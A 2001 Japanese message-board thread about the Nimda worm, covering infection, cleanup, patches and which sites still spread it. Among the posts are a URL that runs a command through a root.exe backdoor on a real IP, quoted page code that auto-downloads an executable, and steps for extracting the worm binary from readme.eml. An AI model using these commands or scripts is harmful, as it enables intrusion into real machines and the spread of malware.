クソなアタックかけてくるPCをシャットダウンさせることだ。
ネットワークテロもそれを放置するやつも区別しない。

>>571
１，２日で簡易復旧されて即感染♪
元の木阿弥だよ(藁

>>572
ちょんって頭悪いのかな？普通気付くだろ。

>>554はIE(正確にはOE)の基本的対策も見ない消防か煽りと見ていいですか？>ALL

ＬＡＮで感染する方は、SP2とか適用してもどうにもならないの!?

>>574
つか今更キャッシュのNimdaが検出されて騒いでるとかじゃない
ことを願う（ｗ

http://61.113.0.130/scripts/root.exe?/c%20dir%20c:\

悲しいね

もう一度カキコしちゃお。

875 ：追加 ：01/09/23 00:28
ニムダは感染する環境の人には何度でも感染してくれる所が特徴だ。
それはユーザーの利用意識による所が大きい。
さらに一部は人間の脳に感染し脳をスポンジ化する。

>>572

つーか、一ヶ月ぐらいシャットダウンされたのも気付かないかも（ｗ

>>554
ここまでの情報だと
１　SAMBAでファイル共有をしている。
２　ＷｅｂサーバはApache
３　書いてないけど、サーバのＯＳはＵＮＩＸ系
４　クライアント機はWindows98とMeが混在
５　クライアント機について、スキャンしたけどNIMDAの感染は発見できない
６　SAMBA共有ディレクトリ上に*.emlファイルが発見された
７　６のファイルを削除したが、また作られていた
ということかな

ほとんどクイズだけど、サーバ機にはWindowsNT/2000はないということ
でいいのかな？

サーバ機経由の再感染が考えられないのであれば、ファイル共有をして
いる範囲のクライアントのどれかが感染しているとしか考えられないね。

５のスキャン、検索をどのように実施したのかが問題のように思えるけど。

Samba上の*.emlファイルを削除して、次ぎに*.emlファイルが作られたら、
その間のSambaのログを追いかけるのも手だね。

噂では、Nimdaに感染したWinMe機から手動で関連ファイルを削除しても、
なぜか元に戻ってしまうケースもあるようだし。

>>579

んで、あんだコケてたわ、とかいって再起動しておしまい。

駆除？するわけないっしょ。バックドアがあるのがその証。

>>580
A1: SAMBA上の.emlは消したけど.nws,*.exe,riched20.dllは消してない

>>580

おかしいと思ったんだよなぁ。鯖Apacheで、おそらくOSもUNIX系なのにやけにニムダ供給鯖になってるとこが多いなぁと・・。

Winユーザがアプした、ってだけのカンジじゃないんだよな、数的に。

いや、単なる疑惑なんだけど。

サーバーの電源ランプが点灯しているのを確認するのがサーバー管理者の仕事ってか？（笑

>>579

一ヶ月たったら、ニムダの存在自体忘れてるね

>>584

実際作るだけ作ってもらって、いじると怒られる情けない管理者っていそう(^^;

>>585　最初から最後までニムダなんて知らないで終わりかも。

sageんでもよいわな。

>>583
感染ファイルの所有者を見ればわかると思われ。
クライアントからアップしたファイルならクライアントの
ユーザ所有になってるはず。

>>583
クライアントで作成した時にhtmlだけスクリプト埋め込まれているのもありそう。
readme.emlがアップされてないので４０４エラーとなる。

あっ、ＦＴＰ時にフォルダー毎アップするとreadme.emlもアップされるから感染サイトになるね。

>>589

よく分かっていないのか、ご丁寧にreadme.emlまで、フォルダの中身丸ごとアップしたとおぼしきところもあるなぁ。

かぶった、スマソ。

>>583
つーか、ファイル共有でマウントしていれば、自動的に書き込まれるけど。

御意。Macでの書き込まれ例もあった。

攻撃ＩＰ制限の無いnimudaII（仮称）が出ると今度はアジアで爆発するなー。

ニムダ発生以降のアクセスログ見ても多少IE6が増えた程度でIE5-5.5の比率は殆ど変わってないや。
Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)
Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)
これでＳＰ２かどうかは判るの？

>>593

なんだが、前ｽﾚでApacheでは平気だとかUNIX系は影響ないだとか、ウルサイのがいてねえ。

>>549
パワーステージさんはバックドアのこともメールしておいたので
大丈夫っぽいね。

>>597
平気っつーか感染したファイルを転送や共有をしない限り
問題はない。
readme.emlやreadme.exeがUnix内でhtmlに感染して増殖する
とでも？
影響あるってのはそういう意味でしか見てないけど。

少し前にこのサイト話題になったじゃない、
http://www1.sphere.ne.jp/noone/
ここのサイトとても役に立ったよ。
他の板で”IP抜くぞー”って息巻いてた粘着君に、
”自信有るならここの掲示板にバーカって書き込みして来てよ。”
て言ったらそれ以来、煽りがやんだ。
見た目ちょっと気持ち悪いもんね。

>>600
わはは。　使わせてもらうよ。

http://wtc.trendmicro.com/wtc/
連休明けの影響だろうけど、昨日一日で日本だけ2倍近く増えてません？

これだけ大騒ぎになっているのに、何の対策もとらない馬鹿が多いんだよ。
どこか目立つ場所で啓蒙活動しないとだめかねえ？

>>602-603
先週の時点で（普通の企業や人間は）大なり小なり対策を打っているんで、残っているのはDQNの連中だろうね！
そこぞのISPのようにNimdaおよびCodeRedに感染したホストを切断して欲しいもんだ（ｗ
http://www.hotwired.co.jp/news/news/business/story/20010925104.html

そして、サービスを停止されてはじめて感染した事実に気づき、ISPへ文句をいううだろうな・・・
「感染したのはお前の所経由なんで責任取れ！」（確かに事実かもしれん）
「MSが悪い！俺は悪くない！だからサービスを使えるようにしろ！」
「他にも感染して使ってる奴がいるだろう！　それを全部止めたら俺のも止めていいぞ！」
「で、どうすれば良いんだ！　こっちに来てから教えろ！」
　：
　：
　：

１００歩譲って連休中はうごけなかったってのは
まあ許そう。
しかし、今日になってもまだ汚染されたまま
パケット垂れ流してきてる輩は、何とかしてくれ。。。

advaoptical.co.jp
whoisで調べた技術担当者にもメールしたがまだそのまま。。。

>>606
技術担当者・・・・・うちの会社の場合、既にそんな奴いないぞ！（ｗ

ど、どうでも良いけど昨日からパターンファイル更新できない漏れバスター
。。。。期限切れな気がする。。。
vote落としてきたけど、バスターのパターン942じゃ検出しない。。。
あそこはガセつかます場所じゃないし。
・・・何もこんな時期に期限切れ来る事無いだろう(TT)

.eml ファイルの関連付けが Becky! なんですけど、
これなら大丈夫なんですか？

>>609
受信・着信メールがすべて不特定多数に転送されています。

>>603

新聞はもうVOTEだとかさわいでるしな。まだニムダもおさまってないのに。

だれも発病してない狂牛病なんかよりでかく扱って欲しいよ＞啓蒙

>>609
Becky!がIEのコンポーネント共有してなきゃ大丈夫？
・・Becky! ユーザーに譲る。
magistrの新種だっけ？メーラー、マルチで使えるの。

>>609
〜なら大丈夫なんですか？

っていう質問が多いけど、このテに大丈夫ってないんだよ。


引用：
875 ：追加 ：01/09/23 00:28
ニムダは感染する環境の人には何度でも感染してくれる所が特徴だ。
それはユーザーの利用意識による所が大きい。
さらに一部は人間の脳に感染し脳をスポンジ化する。

>>602

ほんとだ、倍やん！（＠＠〜☆

>>602
別に、破壊ルーチン組んであるわけじゃ無いし、、、
サーバ管理者さんに頑張ってもらって、、、(以下略)

ついにちゃんとなおしたみたいだね。よかったよ。

http://www.takara-univ.ac.jp/

>>608
9/25更新のパターン945はダウンロードみたいよ。
トレンドマイクロのページみてみな。

ここはいつになったら再開するんだ？

http://www.hyundaijapan.co.jp/

このまま会社ごと日本撤退？（ｗ

>>617

なんかよくわからないけど、ボタン一発アップデートできないときがありますね。
＃押しても反応がない

>>617 のいうように、昨夜もダウンロードでやればできたので、たぶん大丈夫。

>>444の会社はどうなったかなぁ・・。

きょうも不正パケット吐きまくったりしてるのかなぁ・・。

>>617
そうなのか。。。
どうりで、オンラインでリダイレクトしてから反応無くなる訳だ。
・・・でも、、2Mなんだよー。ISDNだと辛いよー。

>>608
ごめんごめん。www.trendmicro.co.jpから行くとなんでだか
わかんないよね。
バスター本体メニューのウィルス情報から行くページだが
ここ見るとわかるだろう。
http://vbc.trendmicro.co.jp/vbc/support/index_support.asp

>>622
サンクス。
というか、オンラインで更新しようとする時ウォールのログみてると
リダイレクトさせた後止まるの。言い方不味かった。ごめん。
vbuster-p1k.activeupdate.trendmicro.co.jpから
a1250.g.akamai.netに逝った後。
・・・・http使って転送掛けてるから今時色々弊害有るんかな。
サイトの情報、サンクス。

>>603
啓蒙してもムダだそうだ・・。
http://japan.cnet.com/News/2001/Item/010906-2.html?rn

これだけ感染被害が出やすくて、次のＸＰでも問題点が解消されてなければ集団告訴もんじゃない？
絶対、ＰＬ法違反だよ。分かってるバグを残して出荷してるんだから。

マイクロソフトはＸＰを無償で配るべき！！

>>625
XPは重そうでいやだす。

>>626
まあ、全員にＳＰのＣＤを毎回送る、あたりが妥当でしょうな。

ワレのヒトには届かないよ（ﾜ

タダなら重量感があっていいかも（藁
金取るなら、安全かつ軽くして欲しい。

あのさ、俺ンとこlinux鯖なんだけどさ、nimdaが出てきた頃から
昼間は大丈夫なんだけど夜になると２ちゃんに書き込めなくなる
んだよね。
「不正proxy使用ですか？・・」　って決まって出るの。

串はずしても変わらないし。。。
何でだろ・・？

>>625　つーか毎回小手先とはいえの修正版出してるしねぇ。
今回も修正が先に出てるわけで。（それ見てういるす作ってるんだろうし（ｗ

「問題点が解消されてな」い、にはあたらないんじゃなかろうかと。

>>625マニュアルにもウインドウズアップデートせい、って書いてあるし、そこには修正版出てるし。マニュアル読んでないならＰＬ訴訟は成立しないと思われ。

>>629
どこにぶら下がってる鯖か知らないけど、このへんか？（勝手な推測
http://www.hotwired.co.jp/news/news/business/story/20010925104.html
同じセグメント内に感染者いたり（ｗ

う〜ん、win鯖じゃないし、ウイルス対策ソフトは最新のを常駐
させてるから今のところ感染はしていないと思うんだが・・・

readme.emiはドコ検索しても見つからないし・・・

>>625

>ＸＰでも問題点が解消されてなければ
：
>マイクロソフトはＸＰを無償で配るべき！！

問題解消してないならいらん。

>>625
>絶対、ＰＬ法違反だよ。分かってるバグを残して出荷してるんだから。

あらかじめ告知されてる不具合は製造者責任にあたらん。

>>628

金取るほうが低機能だったり＞軽い（ｗ

>>629
単に串制限してるだけじゃないの？
生IPなら書き込めるっしょ

CodeRedかなんかに感染してバックドア置かれちゃったようなところ、あるでしょ。

で、CodeRedってたしか進入できたIPはリストにしてそこを集中攻撃したり、そのリストを配布したりするんだよねぇ？

すると今回完全に駆除しても、IISにSP当ててなかったりすると早晩再感染するということ？

仮にバックドア削除してもほかよりもらう確率高いような・・。

バックドアがあるとかCodeRedにかかったような痕跡持ってるところがニムダにかかってる例が多いからそう思っただけなんだけど。

それが、串はずしても書けないんですよ。。。

>>629
ひろゆき

もうだいぶばれてきたようなので白状します。

『不正ＰＲＯＸＹ使用ですか、、、？
じゃなければ、公開されてるＰＲＯＸＹを使用されてるかも。。。
プロバイダかシステム管理者さんと相談してね。（プロキシーを外部から使えないようにしてくださ
い、、、とか、、、）』
　というように表示してますがこれは事実と異なります。
すまんです。本当はこのように表示すべきでした。

「ＰＲＯＸＹ規制中！ .jp以外を規制してます。」

でもこのように表示するとものすごい非難メールが押し寄せる恐れが
あるためできませんでした。

規制に怒った変質者に逆恨みのテロでも起こされたらいやずら。
（省略されました・・全てを読むにはここを押してください）

>>638
>CodeRedにかかったような痕跡持ってるところがニムダにかかってる例が多い

というか、それ狙ってくる。CodeBlueの亜種みたいなもんでしょ。Nimda
・・・んだけど、「redの対策だけパッチ」当ててもredと違う穴突いてくるか
ら再感染。。恐るべし、Concept Virus(CV) V.5

>>641

ああ、やっぱりねぇ。そういうところって、閉鎖になって駆除されたように見えても、すぐ再発してるもんね・・・。

勉強になりました。どうもありがと。

>>641
> というか、それ狙ってくる。

あ、それってこれと関係あります？

158 名前：ん〜ま 投稿日：01/09/20 23:31
linuxなのだが試しに、ダミーのroot.exeとか置いたらアクセスが増えてしまったｗ

>>643
確か、root.exeに対し"HED〜で来るのがブルーで、"GET〜で来るのがNimdaだって誰か言ってた。
逆かも、、忘れた。
んで、有るの確認すると更に次の行動起すよ。同じ所から何発か連続で来ると思うけど。

俺もLinux+Apacheでdefault.ida置いたら集中された。
すげぇ鬱だった。

>>640

そうだったのか・・・教えてくれてありがとう。

>>644
なるほどねぇ。
よくわかった。ありがとう。
単発のDOSプロンプトで動く駆除ツールって、ニムダが作るファイルしか見てないでしょう？
なんか駆除されてもしっかりroot.exe残ってたりして。

https://www.netsecurity.ne.jp/article/8/2877.html

advaも載ってるんだが、早く気づけよ。

スマソ、このスレは最初から目を通しているつもりなのだが、

>●Windows NT 4.0/2000/XP は影響を受けない（ウイルス・ファイルを勝
> 手に実行しないそうです）

って本当ですか？そんなことないですよね（汗

今社内でメールまわってきたのですが。
うちの会社鯖にIIS使ってないせいか、のんきで…

>>649
＞（ウイルス・ファイルを勝手に実行しないそうです）
全部の端末/鯖にパッチ当てたの確認済みなんだよ。優秀な管理者居るね。
・・・そう思っておいた方がシアワセよ。
更に不景気になりそうだし。テロ関係のお陰で。
早まるのは止めなさい。。

>>649

初耳だ(^^;

>>444と同類ではないだろうか。

Ｗ９８など通常のパソコンには感染しない、というのもあった。何なら感染するんだ？

>>650
ニムダ特需でソフトやＰＣが売れているみたいだぞ。
昨日も重そうにヨドバシの梱包されたIBMの鯖の段ボールを重そうに持ってるオヤヂを複数みたぞ。

>650
この不況下で転職など不可能ですので、早まりません（ｗ

>651
…ですよねえ（号泣）
今から管理者に伝えてきます…

>>649
> うちの会社鯖にIIS使ってないせいか、のんきで…

ニムダじゃないけど、W2kで、眠っていたIISを外側から起動させられたケースってなかったけ？(^^;

>650 >652
そういう意味かい！！（ｗ

>>648

なんでもいいけどここ、明らかにこのｽﾚと前ｽﾚチェックしてるね(^^;

>>652
まぢで！！
これでそのオヤヂ達、ネットに繋いだら大喜びするんだろうね。
コレでクリーンな鯖で仕事できるって。

・・・IIS立てるとすれば、、同梱OSのSP、バージョン高ければ良いけど。。
そうか、感染しても大喜びなのか。ウイルスはぢめて見た！って。

>>657
新宿ヨドバシの書籍コーナーで赤帽LinuxのCD付きの本を手に取っているおねいさんを見たが、どこまでホンキなのか・・。

>>658
ナムパすれば良かったのに・・・
対応ドライバの一覧表持って。。。。
ビデオボード、何使ってるの？LANカードは？って。

！!漏れ、早速プリントアウトして張り付いてる!
書籍コーナーに！！
ワクワク！

>>659
いつもよりLinuxコーナーにヒトが多いのはナムパ目当てか？！(^^;

>>657

>>638-647を読む限り、汚れたIPにスッピンのノーパッチ鯖をいきなりつなぐと・・。

>>661
ヤパーリ、パッチは当てとかないとね。
漏れの回線太いから、in/outトラフィク多いと破れないか心配。。。
・・でわ、書籍コーナーに逝て来る！！

>>661

飢えた狼の群れに子羊を投げ込むような

>>661
十分、ありえるだろうね・・・
説明書にはケーブル接続した後にセットアップをはじめてくださいって書いてるから！
実際にそれで、３回入れなおして初めて気づいた厨房知ってるし（ｗ

>>633
>readme.emiはドコ検索しても見つからないし・・・

だれも>>633に突っ込んであげないんだな…可哀想に。

>>629
ひろゆき

もうだいぶばれてきたようなので白状します。

『不正ＰＲＯＸＹ使用ですか、、、？
じゃなければ、公開されてるＰＲＯＸＹを使用されてるかも。。。
プロバイダかシステム管理者さんと相談してね。（プロキシーを外部から使えないようにしてくださ
い、、、とか、、、）』
　というように表示してますがこれは事実と異なります。
すまんです。本当はこのように表示すべきでした。

「ＰＲＯＸＹ規制中！ .jp以外を規制してます。」

でもこのように表示するとものすごい非難メールが押し寄せる恐れが
あるためできませんでした。

規制に怒った変質者に逆恨みのテロでも起こされたらいやずら。
（省略されました・・全てを読むにはここを押してください）

>>662
>ヤパーリ、パッチは当てとかないとね。

そのパッチをネットからダウンロードしよう、なんて腹づもりだったり・・・。

>>657
ところがフロントページのインストールされたW2kがバックドア全開で感染していて
ウプしたページがNimuda配布サイトとなってしまうというオチもある。

http://www.ucar-tky.or.jp/mokuji.htm
　　readme.eml をダウンロードさせるスクリプトが残っているが
　　エラー４０４になる。
　　これで対策されていると言うべきか？否か？
　　どっち。
　

ＪＲ倒壊ニムダ感染してましたー。
葛西社長発表、ＦＷで対処した。これでバッチリにゃ。

>>668
そっち有るのね。＞フロントページ。
・・・そう言えばフロントページ自体、別バグ無かったっけ？？
忘れた。。気のせいか。

おいしくねーよ！

http://211.11.222.51/

>>669

readme.eml が削除されただけね(^^;

手で削除？

ttp://211.11.222.51/
それＯＣＮ側回線のダミーページだよ。

http://61.202.212.148/
本体はこちら。疑惑の61だ。内部がまったり感染してそうね。

>readme.eml が削除されただけね(^^;

>手で削除？
それって　セキュ穴とかバックドアとかそのままってことか？

>>672
#前略
<SCRIPT language=JavaScript>開いちゃうぞ〜("おいしいねニムダ", null, "resizable=no,top=6000,left=6000")</SCRIPT>
・・・頂きました。。ウマカタです。。

>>675

単発ニムダ用の駆除ツールでは、root.exeおとがめなし、なやつもあるみたい。
html内の問題コード削除しないのとか。

>>674

あれえ？

こっちは感染していて、
>ttp://211.11.222.51/
> それＯＣＮ側回線のダミーページだよ。

こっちは感染していないような。
> http://61.202.212.148/
> 本体はこちら。疑惑の61だ。内部がまったり感染してそうね。

そんなことってある？

昼間は見れたのに、また落ちてる・・。

マジで毎晩シャットダウン？(^^;

http://www.takara-univ.ac.jp/

>>679

ニムダ対策？夜閉めるって、何か効果あるんだろうか・・。

ＩＥ５．５　ＳＰ２を使ってます。
先程ＪａｖａをＯＮのまま、ニムダに感染したＨＰを踏んでしまいました。
そしたらTemporary Internet Filesフォルダにreadme.emlが出現。

私のＰＣは感染したんですか？それとも、ダウンロードしただけで
まだ実行されてないんですか？いまいちよくわかりません。
すみませんが、教えてください。

>>679
昼間はニムダを超える高速処理の達人が手動で削除していると思われ(薬

>>681
？マーク付いてる後者に1票。
ブラウザキャッシュ消しなさい。

俺のWIN98SE、この間から起動画面の
WINDOWSってロゴの下に、「By　Nimda」って出るんだけど、
新種？

>>683
ありがとうございます。キャッシュ消してみました。
これから、ウイルススキャンしてみようと思います。

>>684
まじですか？

>>686
マジダヨ。
新種かな？
ノートンのアンチウィルスでスキャンしても、
何も出ないんだよね。
変なソフトでも実行しちゃったかな？

>>687
『*.eml』『*.nws』『readme.exe』『load.exe』あたりを
検索してみそ。
System.iniは「Shell= explorer.exe load.exe -dontrunold」
とかなっていないか？

>>684
フーん。。。
その辺いぢるウイルスって聞いたこと無いなーーー。
確かに新種かもねん。
技術的には可能だろうね。起動画面のネタ元、ローカルで
上書きするだけだし。

>>688
やってみたけど無い。
iniファイルも見てみたけど、Shell= explorer.exe
ってなってた。

しかし、この現象は何だろう？覚えが無いんだけど。

・・・さてさて。。

>>690
自分宛にメール送ってみるとかしてみる？

>>684
そうか、起動画面表示のネタ元とにかく流し込んで
設定でパス通せば良いのか。。。
何処で設定してるんだ？レヂストリかな。。。

これも同じ仕掛け？

開いただけでダウンロードするか聞いてくる。

http://user.memberz.to/active/001/main.html

>>694
lolita.exeを落させようとするものだと思われ。

いやはや、思わぬ弊害かな。>アダルトサイト運営者。

>>694
試しにアクセスしてみた。
推測だが、Q2アクセスソフト、または、
ダイヤルアップ書き替えソフトと思われる。

<!--IPT LANGUAGE="JavaScript"
<!--
newWin =
window.open("java.html","","width=500,height=200");
// --

</SCRI-->
<META HTTP-EQUIV="Refresh" CONTENT="15;URL=http://www.mars.sphere.ne.jp/yanoo/DTI/lolita.exe">
</HEAD>

>694
というか、アダルト巡りはjava切りなさいって（ｗ
敢えて虎穴に入りたいならかまわんが。。。

ありがとうございます。


リロードの代わりにダウンロードか･････？

>>699
リロードしても、結局対象exeだから、ダウンロードする羽目ね。

一つすごく気になっているのだが、MSNがニムダダウンロードサービスをやっていたころ、MSN鯖にはバックドアががあったのだろうか。

>>696

あ？てことはQ2業者の中には、今回ニムダが突いたバグを知っていて、未対策ブラウザならだまって設定させていたものがあった・・？

>>702
しまった。先にそれに気がついていれば。

>>702
可能性有りかも。
あれ利用するのそんなに難しくないし。。。
javaのopenコマンド自体は不正でも何でも無いが、
emlファイルの作り方ね。。

何もしていないのに設定されたって言っていた人、いたよな。エロサイト見てたせいで信用はされなかったが（ｗ

なんだか「prof.doc」とか言う添付ファイルがメールについてきたよ。
やっぱりなって感じ。

*** readme.exe のソースコード ***

どこかに落ちてなぁい？

>>707
作ったやつしか持ってないだろ。

>>707
感染サイトから.eml落してデスアセ取ってた人は初期の頃居たよ。。
このスレパート1から2辺り。
その頃、guestアカウント追加する活動疑問視されてたけど、ソースか
らはレジストリ弄る命令読み取れた。

>>706

はやくういるす駆除ソフトメーカーに報告してくれ(´Д`)

>>707

こういうのけ？
http://211.11.222.51/

>>709
全てリンク切れ。

どこかにＵＰしてけれぇ。

>>712
ありがとう。ﾀﾉﾑ。

あーあ、閉鎖されちゃったよ
>>158
>>243
>>266
>>267
>>274
>>276
>>285
>>290
>>329
>>331
>>600
>>601
http://www1.sphere.ne.jp/noone/

有名サイトだったのに。

つーか、今プロバイダ系個人サイトの掲示板に


<html><script language="JavaScript">billgates.open("ほげほげ.eml", null, "resizable=n
o,top=6000,left=6000")</script></html>

とかカキコすると、そこ削除されるね(^^;

>>715
厨房達には願っても無い情報だ。
検索サイトも感染サイトが引っかからなくなったよ。
スクリプトコードの記述ぐらいは問題無いと思うんだけどなー。

>>712
・・・ううう、
一応、リスク犯して作業したの俺じゃ無い。。だからそのままUPするの
は気が引ける。。その彼が個人スペースで公開してたのは確か。
逆アセソースというより、binのダンプデータだった。。。

俺、リンク先残ってるかと思ってROMったの探したけど、丁度PART1から
2に移行する辺りのレス保存できてなかった。。。多分そこでリンク先貼
って有ったと思われ。履歴にも残ってなかった。。
・・やり方としては、readme.eml落して、txtに拡張子変換。base64エ
ンコードしてある添付部分をtxtコピペで切り出しデコード。
readme.exeなんかの名前で保存。
後は、バイナリエディターなりでダンプ取る。拡張子txtにしとく方が無難。
・・・但し、アンチウイルスの常駐切らないとこの作業できない。検出駆除
されちゃう。
ダンプ取ってる最中も自爆しかねない。←コレ一番危険。
本体の拡張子弄るときも、要注意。
・・・ごめんよ。力になれなくて。。。
base64エンコード/デコーダーはフリーで幾つかある。
MIMEBase64ってのでやった。俺は、テキストで覗いただけ。
binエディタもフリーの奴、いっぱい有る。

>>716
キャッシュ、、、検出、、、クレーム、、
あまり言いたく無いよ。
流石にreadme.eml改変バージョン、自分サイトで悪意の目的に使う奴は
居ないと思うけど。
・・・これからパソコン買い換えたり新規で買う初心者ユーザー居るわ
けだし。。。潜在的な危険性は否定できない。。。
パッチはアンチウイルスよりも重要。

>715
それをメールに貼り付けて送信しウィルスバスターＰＯＰ３マシンで受信するとウィルス発見ってなるよ。
既出？

>>719
一応外出。
ノートンだとどうも検出しないのね。
メール本文にコピペでいけるよ。>バスター
書き込みtxt添付した場合はどうなのかな。
まぁ、只のいたづらレベルだから、、別に良いけど。
アンチウイルスの動作確認には、安全お手軽でいい方法かな。。
スパム爆弾はいやづら。。

ヒュンダイまだ閉鎖って・・・一週間かかって駆除できないのか？

>>721
実はここ、昼ごろ復活してました。

http://www.hyundaijapan.co.jp/

でもまだＮＴ鯖のままでした。
つまり（ｗ

>>721
どこぞのフォーマット厨房を信じて
ＨＤフォーマットして全入れ替えしてるんじゃない？(藁

>>714
心配しなくても大丈夫だよ。
きっと次のネタの仕込みしてるんだろう。

>>723

いまとなっては懐かしいねえ＞フォーマット厨（ｗ

あぱっ厨・りなっ厨もいましたな。

今日の昼見た限り、少なくともここは改宗したみたいだったのですが・・。
http://www.takara-univ.ac.jp

>>724

VOTEさがしにいったのかな？(^^;

---
>>723

ニダ社は

>>652
>>657
>>661

このへん実践してたりな（ｗ

>>726

コマンドメール投げると、VOTEを送り返してくれるサイトはどこかにないか？（ｗ

バックドア全開でなにされたかわかんねーようなマシンは
フォーマットでもしないと安心できないと思うがどうよ？

ネットバブル状態でワレもワレもと開設してそのまま放置だったサイトが、
感染・駆除めんどくなって閉鎖、そのまま放置ってのが増えそうな予感・・。

個人・企業問わず。

なんらかのサービス（情報提供）やネット通販でもやってない限り、大半は会社案内webなんかで大した役にはたってなかったろうけど。

>>727
VOTEは英語がサパーリ判らないと意味なし。
よって日本ではただのジャンクメール扱いとなる。
日本語そのものがウィルス対策となっている(ワ

>>728

フォーマットしても、パッチなんて思いもよらず再感染していると見てるがどうよ？

>>730

そうそう。だからアメリカのＭＬにでも入らないと入手できないわけよ（ｗ

フォーマット論争かよ。723が煽るから。
723は粘着アンチフォーマット君に決定。
同じ議論の繰り返し。
何の進展もない。
もうやめようぜ。

>>728
感染
フォーマット
バックアップ復元
なにもかも感染直前に復元
再感染

これの繰り返しと思われ。

>>731
俺もそう思うよ。

ＭＳＮが再感染しないのは、ある意味スゴイと思われ（ｗ

Ｍ＄他ウィルス対策ページ。
鯖立てている場合の感染はCodered対策がまず先って教えてやれよー。

.emlのファイルの関連づけ削除してしまった

>>737

あ��(￣△￣；　　そういえばそのテにはどこにも書いてないね。

ニムダ用駆除ツールもバックドアおとがめなしだし。

>>736

鯖をLinuxにしたと思われ（ｗ

HTTP/1.0 200 OK
Date: Wed, 26 Sep 2001 16:07:37 GMT
Server: Microsoft-IIS/5.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Content-Length: 78215
Content-Type: text/html

Ｐ３Ｐって・・・・もうこんなモノ吐いてるのか！？

ＦＯＲＭＡＴ→　ｏｓいんすと→　ネットの設定（メルの設定はしない）
→　とりあえず、ｗｉｎｄｏｗｓ　ｕｐｄａｔｅに一発目に行って、ＩＥ５．０１ｓｐ２
か５．５ＳＰ２を当てる→　ネットを切ってメル設定→　メルの送受信はしないで
安置ウイルスいんすと→　ネット繋いで安置を最新版にあっぷ

理解力が低いやつは、これで完璧っつっといたらええべ？？
漏れはこんなめんど〜ナ事はする気ないが（ｗ　

>>742
プリインストールされてるメーカー製パソコンをデフォルトで使っているユーザーには
それでも専門用語が多いし手順も多すぎる・・・ハァ。
メーカーが対策済みのリカバリＣＤ−ＲＯＭでも出さないといけないのかなハァハァ。

>>742

>メルの送受信はしないで 安置ウイルスいんすと→　ネット繋いで安置を最新版にあっぷ

と、いいたいところだけど、ういるすばすたなどはメルでキーをもらわないと、最新版にアプできないよん。

>>744
その点だけど、トレンドマイクロの場合は現在インターネット上で
最新の検索エンジンとパターンファイルを臨時（？）で配布している模様。

多分、ノートンも同様の措置をとっているかと思われ。

>>742

このレベルなのに、中小企業などで強制的に鯖建立やらされて、やっとの思いで外から見えるようにした時点でちからつきているのに、システム管理者の烙印（ｗまで押されちゃったやつにはどうしてやったらよかんべ。

>>679

今朝見たら、

宝塚造形芸術大学
http://www.takara-univ.ac.jp/
また見える。

夜は寝て、昼は起きる鯖になったもよう(^^;


そしてここに飛ばされる。
http://exchange.takara-univ.ac.jp/

しかしこのURLは一体なんだ？(^^;

>>721-722

ヒュンダイきょうも閉まってら。
http://www.hyundaijapan.co.jp/
やはり昨日復旧→即再感染→ｳﾏｰ(´Д`) となったと思われ。

ネタにマジレスしてあまつさえ信じ込んでる629に誰も突っ込
まないのにﾜﾗﾀ

はっきんぐから
>>466


夜のオカズまで
>>694-695


手広くカバーするこのｽﾚは２ちゃんの縮図だな(^^;

ホスト名: DEC-Router.takara-univ.ac.jp
ＩＰアドレス: 202.223.228.1
ホスト名: ns.takara-univ.ad.jp
ＩＰアドレス: 202.223.228.2
ホスト名: FireWall-1.takara-univ.ac.jp
ＩＰアドレス: 202.223.228.3
ホスト名: www.takara-univ.ac.jp
ＩＰアドレス: 202.223.228.4
ホスト名: mail.takara-univ.ac.jp
ＩＰアドレス: 202.223.228.5
ホスト名: Exchange.takara-univ.ac.jp
ＩＰアドレス: 202.223.228.9
ホスト名: artinfo.takara-univ.ac.jp
ＩＰアドレス: 202.223.228.20

>>751

どうやら高くついたようだな＞宝塚造形芸術大学 短期大学部

なんだこりゃぁ？


Web View Browser
http://www.mcafee.com/myapps/utilities/ov_neoplanet.asp

これならニムダにも感染しないぞ、ってか？

宝塚造形芸術大学 短期大学部

当大学ではコンピューターを使ったアーティストの自由な自己表現の1つとして作品名ニムダを展示しております。
決して何も解っていないコンピューターオタ達の言うワームの感染ではありません。

と開き直れ。

>>751

感染後にあわてて業者に対策させたのだろうが、

Exchange.takara-univ.ac.jp

このへんですでにダマされてると思われ・・。

>>754

そうだ、表紙にニムダ配布の事実を伝えろと抗議すべきだ

http://www.hotwired.co.jp/news/news/business/story/20010925104.html

うちのＣＡＴＶ屋もやってくれ・・。

>>751

あれえ？

ρ(^-^)ここにいくと
202.223.228.4
画像もちゃんと表示される。

ρ(^-^)ここにいくと
www.takara-univ.ac.jp
↓
202.223.228.2
を見て、
↓
Exchange.takara-univ.ac.jp
にすぐ飛ばされる。画像が表示されない。

ρ(^-^)ここにいくと
202.223.228.9
画像が表示されない。

なんか設定まちがってない？(^^;



あれ？今www.takara-univ.ac.jpに行くと・・・？

めちゃくちゃだぁΣ＜(゜▽゜;)＞

>>757
日本じゃ無理だな・・・

>>759

どうみても自分の使ってるＣＡＴＶ屋の、他のユーザーからの攻撃がくるのよ・・。

>>760
なぜ貴方はそう思ふのか

はきーんぐやら、わーむやら、日本のサイトってけっこうやられてるんだ・・。
http://people.site.ne.jp/2001/2001.html

ニムダをWin機からアップ？放置？
http://www.conet-nagano.gr.jp/

ＩＥ５．５をＳＰ２にアップグレードしたんだけど、
その後Ｗｅｂを見ていたら、
３回もノートンでNimdaが検出された。
ＳＰ２にアップグレードしただけじゃ、対策にならないのかなぁ

202.223.228.4
のヘッダIIS/3.0？

HTTP/1.0 200 OK
Server: Microsoft-IIS/3.0
Date: Thu, 27 Sep 2001 **:**:** GMT
Content-Type: text/html
Accept-Ranges: bytes
Last-Modified: Tue, 18 Sep 2001 00:32:00 GMT
Content-Length: 26923

202.223.228.9
のヘッダ一応Apache

HTTP/1.1 302 Found
Date: Thu, 27 Sep 2001 **:**:** GMT
Server: Apache/1.3.12 Cobalt (Unix) mod_ssl/2.6.4 OpenSSL/0.9.5a PHP/4.0.1pl2 mod_auth_pam/1.0a FrontPage/4.0.4.3 mod_perl/1.24
Location: http://exchange.takara-univ.ac.jp/
Connection: close
Content-Type: text/html; charset=iso-8859-1

http://www.hotwired.co.jp/news/news/technology/story/20010920301.html
LaBreaってなんか面白そうだね。

>>765

Server: Apache/1.3.12 Cobalt (Unix)
202.223.228.9
は画像が出ないよね。

